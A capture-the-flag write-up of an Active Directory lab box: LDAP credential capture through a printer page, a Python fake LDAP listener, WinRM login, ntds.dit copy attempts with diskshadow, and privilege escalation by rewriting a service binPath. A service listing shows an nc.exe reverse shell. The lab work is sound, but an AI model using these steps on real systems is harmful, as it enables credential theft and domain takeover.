Tracks-AD-Return

AD

A very simple AD box, well suited to the pure-beginner stage.

nmap

└─$ sudo nmap -sS 10.10.11.108 -p- --min-rate=3000	
Nmap scan report for 10.10.11.108
Host is up (7.9s latency).
Not shown: 61510 filtered tcp ports (no-response), 4018 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49664/tcp open unknown
49679/tcp open unknown


└─$ sudo nmap -sU 10.10.11.108 --top-ports=200 --min-rate=3000
Warning: 10.10.11.108 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.108
Host is up (0.49s latency).
Not shown: 184 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
68/udp closed dhcpc
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
427/udp closed svrloc
664/udp closed secure-aux-bus
1028/udp closed ms-lsa
1029/udp closed solid-mux
1433/udp closed ms-sql-s
3052/udp closed apc-3052
5000/udp closed upnps
6346/udp closed gnutella
32770/udp closed sometimes-rpc4
33281/udp closed unknown
49196/udp closed unknown

to User

The web part is a printer configuration page.


My thinking: it's LDAP and there is a password field. I remembered a similar scenario on Authority, where the LDAP connection sends the password along with it (an LDAP simple bind carries the password in cleartext), so the same should apply here; my guess was that Update performs a connection test.

So I changed the server address to my own IP and started a listener:

└─$ nc -lnvp 389  
listening on [any] 389 ...
connect to [10.10.16.10] from (UNKNOWN) [10.10.11.108] 61978
0*`%return\svc-printer�
1edFg43012!!

That gives us the credentials (the printable bytes of the bind request are the DN and the simple-bind password):

svc-printer/1edFg43012!!
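The garbled bytes in the nc output are an LDAP simple BindRequest: BER-encoded, with the DN and the password as plain OCTET STRINGs, which is why the password is readable the moment the printer "tests" the connection against a host we control. The listener below is an added example written for this post, not code from the original writeup or from the printer software. It parses such a bind, answers with a success BindResponse so the client is satisfied, and, going one step beyond the page, also recognises a SASL bind, where no password is on the wire at all. Both sample messages are constructed here (the message IDs and the GSS-SPNEGO mechanism name are assumptions); the DN and password values are the ones captured above.

```python
import socket
import sys

# Constructed sample 1: the simple bind, laid out to match the nc output in this post.
# Message ID 1 is an assumption; name and password are the values captured above.
SAMPLE_SIMPLE_BIND = bytes.fromhex(
    "302a"                                  # SEQUENCE (LDAPMessage), 42 bytes
    "020101"                                # messageID INTEGER 1
    "6025"                                  # [APPLICATION 0] BindRequest, 37 bytes
    "020103"                                # version INTEGER 3
    "0412" + b"return\\svc-printer".hex()   # name OCTET STRING, 18 bytes
    + "800c" + b"1edFg43012!!".hex()        # [0] simple OCTET STRING, 12 bytes
)

# Constructed sample 2: a SASL bind (GSS-SPNEGO is an assumed mechanism); no password on the wire.
SAMPLE_SASL_BIND = bytes.fromhex(
    "3018" "020102" "6013" "020103" "0400"  # LDAPMessage, id 2, BindRequest, v3, empty name
    "a30c" "040a" + b"GSS-SPNEGO".hex()     # [3] SaslCredentials { mechanism }
)


def _tlv(buf, pos):
    """Read one BER tag-length-value at buf[pos]; return (tag, value, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long-form length: low 7 bits = number of length octets
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def parse_bind_request(msg):
    """Decode an LDAPMessage carrying a BindRequest (RFC 4511 section 4.2)."""
    tag, body, _ = _tlv(msg, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    tag, mid, pos = _tlv(body, 0)
    if tag != 0x02:
        raise ValueError("missing messageID")
    tag, op, _ = _tlv(body, pos)
    if tag != 0x60:                         # [APPLICATION 0] = BindRequest
        raise ValueError(f"protocolOp tag 0x{tag:02x} is not a BindRequest")
    _, ver, pos = _tlv(op, 0)               # version INTEGER
    _, name, pos = _tlv(op, pos)            # name LDAPDN (OCTET STRING)
    tag, cred, _ = _tlv(op, pos)            # authentication CHOICE
    if tag == 0x80:                         # [0] simple: the password itself, cleartext
        auth = ("simple", cred.decode("utf-8", "replace"))
    elif tag == 0xA3:                       # [3] sasl: SEQUENCE { mechanism, credentials OPTIONAL }
        _, mech, _ = _tlv(cred, 0)
        auth = ("sasl", mech.decode("utf-8", "replace"))
    else:
        raise ValueError(f"unknown authentication choice 0x{tag:02x}")
    return {"message_id": int.from_bytes(mid, "big"), "version": int.from_bytes(ver, "big"),
            "name": name.decode("utf-8", "replace"), "auth": auth}


def bind_response(message_id, result_code=0):
    """BER-encode a BindResponse: resultCode, empty matchedDN, empty diagnosticMessage.
    Message IDs up to 127 fit the one-octet INTEGER used here."""
    body = b"\x0a\x01" + bytes([result_code]) + b"\x04\x00\x04\x00"
    op = b"\x61" + bytes([len(body)]) + body        # [APPLICATION 1] BindResponse
    inner = b"\x02\x01" + bytes([message_id]) + op
    return b"\x30" + bytes([len(inner)]) + inner


def serve_once(host="0.0.0.0", port=389):
    """Accept one connection in place of nc, decode the bind, and answer success (0)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            req = parse_bind_request(conn.recv(4096))
            print(f"[{peer[0]}] bind v{req['version']} name={req['name']!r} auth={req['auth']}")
            conn.sendall(bind_response(req["message_id"]))
    return req


if __name__ == "__main__":
    if "--listen" in sys.argv:
        serve_once()                        # needs root (or CAP_NET_BIND_SERVICE) for tcp/389
    else:
        for sample in (SAMPLE_SIMPLE_BIND, SAMPLE_SASL_BIND):
            print(parse_bind_request(sample))
```

Run it with --listen (as root, for port 389) to take nc's place; without arguments it only decodes the two embedded samples. The point of the SASL sample is the caveat: only a simple bind leaks the password. If the device had been configured for Kerberos or NTLM over SASL, all the listener would see is the mechanism name.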

Had a look at SMB:

└─$ smbmap -u svc-printer -p '1edFg43012!!' -H 10.10.11.108

SMBMap - Samba Share Enumerator v1.10.5 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)

[+] IP: 10.10.11.108:445 Name: 10.10.11.108 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ ONLY Remote Admin
C$ READ ONLY Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
[*] Closed 1 connections

Everything is readable.

When I was doing this box the target had problems and the port scan wouldn't complete (5985/tcp never shows up in the nmap output above), so seeing that every SMB share was readable I blindly tried WinRM with these credentials, and it logged straight in.

get User

to Root

Nothing interesting in the local files, but the privileges are basically maxed out:

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled

I first wanted to escalate with SeBackupPrivilege, but ran into a few problems, so a quick note on them here.

SeBackupPrivilege

First, diskshadow:

https://pentestlab.blog/tag/diskshadow/

I tried the method from that blog, running a script with diskshadow /s:

set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\<path>\ntds.dit
delete shadows volume %someAlias%
reset

When it ran, the echoed line was "-> set context persistent nowriter": the trailing s of what I had written was gone.

*Evil-WinRM* PS C:\Windows\System32> diskshadow.exe /s c:\te\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: PRINTER, 1/2/2025 12:15:42 AM

-> set context persistent nowriter

SET CONTEXT { CLIENTACCESSIBLE | PERSISTENT [ NOWRITERS ] | VOLATILE [ NOWRITERS ] }

CLIENTACCESSIBLE Specify to create shadow copies usable by client versions of Windows.
PERSISTENT Specify that shadow copy is persist across program exit, reset or reboot.
PERSISTENT NOWRITERS Specify that shadow copy is persistent and all writers are excluded.
VOLATILE Specify that shadow copy will be deleted on exit or reset.
VOLATILE NOWRITERS Specify that shadow copy is volatile and all writers are excluded.

Example: SET CONTEXT CLIENTACCESSIBLE

That's because Windows and Linux use different line endings (CRLF versus LF), so the script has to be converted with unix2dos first:

└─$ unix2dos diskshadow.txt -n diskshadow_dos.txt
unix2dos: converting file diskshadow.txt to DOS format...

Now it's fine; you can see the CR (^M) at the end of every line:

└─$ cat -v diskshadow.txt 
set context persistent nowriters^M
add volume c: alias someAlias^M
create^M
expose %someAlias% z:^M
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit^M
delete shadows volume %someAlias%^M
reset^M

When I uploaded the converted file and ran it again, it failed with a VSS error instead:

*Evil-WinRM* PS C:\Windows\System32> diskshadow.exe /s c:\te\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: PRINTER, 1/2/2025 12:23:19 AM

-> set context persistent nowriters
-> add volume c: alias someAlias

COM call "(*vssObject)->InitializeForBackup" failed.

Looking into it, the VSS service wasn't running, so diskshadow can't do anything.

Next I tried robocopy; this time ntds.dit was locked:

PS C:\te> robocopy /B C:\Windows\NTDS .\ntds ntds.dit

-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------

Started : Thursday, January 2, 2025 1:20:47 AM
Source : C:\Windows\NTDS\
Dest : C:\te\ntds\

Files : ntds.dit

Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

New Dir 1 C:\Windows\NTDS\
New File 16.0 m ntds.dit
2025/01/02 01:20:47 ERROR 32 (0x00000020) Copying File C:\Windows\NTDS\ntds.dit
The process cannot access the file because it is being used by another process.
Waiting 30 seconds...

Then I tried wbadmin, following what ippsec did on Blackfield:

https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610s

Same story, it failed too; I forget whether it depends on the VSS service or on something else.

Then I tried copying the file through the SeBackupPrivilege DLL:

https://github.com/giuliano108/SeBackupPrivilege

Same thing again, ntds.dit is in use:

Copy-FileSeBackupPrivilege : Opening input file. - The process cannot access the file because it is being used by another process. (Exception from HRESULT: 0x80070020)
At line:1 char:1
+ Copy-FileSeBackupPrivilege c:\windows\ntds\ntds.dit c:\te\ntds.dit -O ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Copy-FileSeBackupPrivilege], Exception
+ FullyQualifiedErrorId : System.Exception,bz.OneOEight.SeBackupPrivilege.Copy_FileSeBackupPrivilege

So this box forces you down a different route, which is pretty annoying. (The underlying reason: robocopy /B and Copy-FileSeBackupPrivilege open the live file with backup semantics, which bypasses the ACL but not the sharing lock, and ntds.dit is held open exclusively by lsass. The only way to read it is from a shadow copy, and every shadow-copy route here needs VSS.)

Server Operators

PS C:\te> whoami /all

USER INFORMATION
----------------

User Name SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled

You can see the user is in Server Operators, which is why it holds all these privileges.

Microsoft's documentation describes the group in some detail:

https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups#server-operators

Quoted from there:

Server Operators

Members of the Server Operators group can administer domain controllers. This group exists only on domain controllers. By default, the group has no members. Members of the Server Operators group can take the following actions: sign in to a server interactively, create and delete network shared resources, start and stop services, back up and restore files, format the hard disk drive of the computer, and shut down the computer. This group can't be renamed, deleted, or removed.

By default, this built-in group has no members. The group has access to server configuration options on domain controllers. Its membership is controlled by the service administrator groups Administrators and Domain Admins in the domain, and the Enterprise Admins group in the forest root domain. Members of this group can't change any administrative group memberships. This group is considered a service administrator account because its members have physical access to domain controllers, can perform maintenance tasks such as backup and restore, and can change the binaries installed on the domain controllers. See the group's default user rights in the table below.

The following writeup covers the technique:

https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/

So pick a service, change its configuration, then restart it. Being allowed to rewrite a service's binary path and start the service means running an arbitrary command as that service's account (typically LocalSystem); that the group-add below succeeds confirms it.

*Evil-WinRM* PS C:\temp> services

Path Privileges Service
---- ---------- -------
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe True ADWS
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys True MpKslceeb2796
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe True PerfHost
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" False Sense
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" True VGAuthService
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" True VMTools
C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.16.3 6666 True VSS
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe" True WdNisSvc
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe" True WinDefend
"C:\Program Files\Windows Media Player\wmpnetwk.exe" False WMPNetworkSvc

Like the article, I used VMTools. First change the VMTools config so its binPath is the payload to execute; here I add the current user to the local Administrators group. Two things worth noting. The VSS entry in the listing above already has its path replaced with an nc.exe reverse shell pointing at 10.10.16.3, so the real VSS service could never start, which is exactly why the shadow-copy attempts earlier failed. And before overwriting a binPath, record the original one (sc.exe qc VMTools shows it as BINARY_PATH_NAME) so it can be put back afterwards.

*Evil-WinRM* PS C:\temp> sc.exe config VMTools  binPath="cmd.exe /c net localgroup administrators svc-printer /add"
[SC] ChangeServiceConfig SUCCESS

Then stop the service:

*Evil-WinRM* PS C:\temp> sc.exe stop VMTools                                                             
SERVICE_NAME: VMTools
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0

Check the service state again; it really is stopped:

*Evil-WinRM* PS C:\temp> sc.exe query VMTools

SERVICE_NAME: VMTools
TYPE : 10 WIN32_OWN_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0

Start the service. This reports an error, because what we told it to run isn't a real service and never reports back to the service control manager, so the 1053 timeout is expected (heh); our group-add command ran anyway:

*Evil-WinRM* PS C:\temp> sc.exe start VMTools
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

Because I'm still in the same evil-winrm session and haven't logged out and back in, whoami /all won't show the Administrators group yet.

It does show up in net localgroup administrators, though:

*Evil-WinRM* PS C:\users\administrator\desktop> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
svc-printer
The command completed successfully.

Without logging in again, though, I still can't do anything that needs Administrators, so a fresh logon is needed before root.txt can be read. It's the same principle as with Kerberos tickets: group membership is stamped into the access token (or the ticket's PAC) at logon time, so after a membership change you have to obtain a new token or ticket.

After logging back in, whoami /groups shows the Administrators group and everything works:

*Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288

get ROOT


If VSS and the like had been working, this would be a nice box for testing things in.